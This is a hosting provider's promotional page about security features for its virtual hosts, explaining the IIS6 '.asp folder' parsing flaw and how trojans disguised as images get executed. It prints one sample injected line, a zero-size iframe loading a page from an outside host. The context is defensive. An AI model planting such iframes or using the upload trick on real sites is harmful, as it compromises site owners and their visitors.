购物车
0
我的购物车
共
0
件商品,共计
0
去购物车结算
充值预付款
提交工单
登录
注册有礼
新用户
新人专享优惠
立即创建西部数码账号,获取2660+元新用户礼包!
创建账号
消息中心
(
)
管理中心
您好,
账户级别:
银牌代理
|
在线充值
进入会员中心
退出
业务管理
域名管理
虚机管理
服务器管理
Mssql管理
最近到期
域名服务
push域名
域名转入
域名转出
模板过户
模板管理
域名抢注
我的预定
我的竞价
我的关注
竞价结束
我已得标
我是卖家
发布交易
正在出售
等待上架
最近卖出
款项提现
我是买家
已购一口价
我的关注
代购域名
域名估价
财务管理
在线充值
财务明细
发票索取
优惠券
账号管理
修改资料
密码修改
密保修改
账号认证
我的价格
联系我们
提交工单
查看回复
在线客服
电话助手
首页
一口价域名
一口价常见问题
一口价交易规则
发布一口价交易
签约店铺专属权益
签约店铺服务协议
我的一口价
我的关注
发布交易
我的已购
我的在售
批量购买
我的已售
签约店铺
签约权益
立即签约
委托购买域名
担保交易
域名工具
Whois查询
备案查询
被墙检测
熊掌查询
一口价交易
一口价域名
精选一口价
今天新增
今日降价
推荐店铺
店铺排行榜
我的收藏
收藏排行
域名抢注
域名交易常见问题
域名交易服务协议
什么是代理出价?
发布域名交易
域名拍卖、交易、抢注问题
西部数码询价交易流程及规则
交易服务
域名代购
预订竞价
域名抢注
竞价大厅
热门预订
热门竞价
NewG抢注
NewG抢注竞价
我的竞价
我的关注
淘域名
一口价域名
今天新增
精选一口价
域名工具
Whois查询
备案查询
被墙检测
熊掌查询
竞价大厅
域名注册
域名注册常见问题
域名注册常见问题
如何选择域名类型?
如何购买域名(注册流程)?
域名到期了如何续费?
如何转入、转出、过户域名?
域名服务
注册量查询
域名转入
外部域名入库
whois查询
离线注册
智能DNS管理
域名注册价格
域名使用指南
注册局安全锁
5折转入活动
智能推荐域名
SSL证书
域名注册
英文域名注册
一口价域名
批量查询
过期域名预订
批量注册
近期促销
域名管理
我的域名
独立控制面板
获取域名证书
虚拟主机
虚拟主机常见问题
购买虚拟主机常见问题咨询
如何选择合适的虚拟主机?
虚拟主机购买流程
选择多大的空间和流量合适?
虚拟主机如何选择线路?
数据库产品
MSSQL数据库
Mysql数据库
经济型主机
基本型主机
Linux主机
超G型主机
全能型主机
BGP多线主机
双线主机
集群主机
独享云虚拟主机
独享基础型
独享标准型
独享高级型
独享豪华型
功能型主机
ASP.NET主机
Java主机
双栈主机(IPv6)
海外主机
香港主机
美国主机
云服务器
云服务器常见问题
云服务器功能服务概览
云服务器介绍
如何选择合适的云主机
如何购买云主机?
常见问题操作指南
上云数据迁移方案
服务器租用
服务器租用
服务器托管
定制服务器
站群服务器
存储备份&流量
云快照
云盘
FSS对象存储
共享流量包
云服务器管理
我的云服务器
独立控制面板
提交工单
网速测试
解决方案&工具
网站管理助手
负载均衡解决方案
IPv6转换服务
IPv6支持度检测
Web应用上云
云服务器购买
弹性云服务器
高防云服务器
大带宽云服务器
香港云服务器
美国云主机
云数据库MySQL
云安全
DDoS高防
SSL证书
CC攻击防护
安全防护详解
【云合伙人】邀请好友首次上云,最高可获得25%现金返利!
京东购物卡免费送!最高5000元!
香港免备案主机全新升级!买2年送1年!
更多活动了解>>
新闻中心
促销信息
西部数码虚拟主机升级为10重安全保障!
因系统层出不穷的
上传漏洞
,
注入漏洞
,加之Win2003本身的设计缺陷,导致目前国内大多数的中小网站都存在或多或少的安全问题。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。
西部数码利用其技术优势,推出10重安全保障的虚拟主机,让菜鸟也不再被木马困扰!
安装了iis6的所有服务器,受影响的文件名后缀有.asp .asa .cdx .cer .php .pl .cgi等。
网站的超级管理员权限被盗、网站内容被篡改、打开网页杀毒软件提示有病毒。
Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。并且,经我司技术人员测试,这个问题不限于asp,甚至php, CGI等都存在这种问题。 目前国内大部分的网站都是运行在IIS6下,如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行,如果黑客将一个 hack.asp 文件改名为 hack.gif 上传到这些目录中,那么不堪设想...
Stream开关设置
ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。
Fso开关设置
FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。
Ftp权限设置
如果你的网站建好后,今后一段时间都不会再用到ftp上传功能,您可以暂时关闭FTP上传。这有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作你空间内的文件。设置后60秒后生效。
脚本权限设置
您可以设置您的网站支持哪些网站脚本,如果您的网站只使用了asp,您可以设置为只开放asp权限。这样黑客即使上传了php的木马到您的空间也不能运行!最少的权限=最大的安全!
写入权限设置
本系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。
IP 限制
您可以明确拒绝或授权某些IP地址对您网站的访问。 对某些重要的子目录,如论坛的后台管理目录/admin/您可以设置为所有人拒绝访问,只允许您自己的ip访问.这样即使黑客知道了你论坛的超级管理密码,也无法对你的论坛进行管理和破坏!
文件保护
您可以设置您要保护的文件,当文件被保护之后,该文件将无法从web访问。您可以使用该功能来保护您的重要文件的安全性,比如ACCESS数据库等。
目录保护
通常用户网站被黑(如网页被篡改,文件被盗,被删等)都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。 所以在无法确认系统是否存在上传漏洞的情况下,只要保证文件上传目录没有脚本运行权限,那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站,使您网站更安全。
自动查杀病毒木马
功能介绍:如果您的网站存在上传漏洞或注入漏洞,很容易被黑客上传木马,添加病毒代码。查看您的网页源代码,会发现病毒代码一般是:
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常会在您的网站里面留下后门程序,如海洋顶端asp木马,以便日后再次侵入您的网站。使用该功能,可以将这些病毒木马一网打尽!
服务器端自动杀毒
因传统杀毒软件不能有效地识别网页木马,特别是网页木马经常被加壳或制作为变种!所以我司自主开发了专门针对网页木马的杀毒软件,每天晚上自动扫描所有网站。发现病毒的,对该文件自动更名;发现iframe木马的,对木马代码自动清除;并自动通过电子邮件通知你,让您轻松掌握您的网站情况
(业界独有)
[网易]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷 发表于
2007-02-16
[动易]
动易2006最新漏洞公告(2007-2-15)
[积木网]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
[动易网络]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
2007-3-15
[IT站长网]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
2007-3-3
[360安全论坛]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
2007-2-27
[csdn]
Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷
[迪赛网]
动网论坛上传文件漏洞的原理以及攻击的代码实现
[网络安全社区]
动网最新漏洞使用代码
分享至: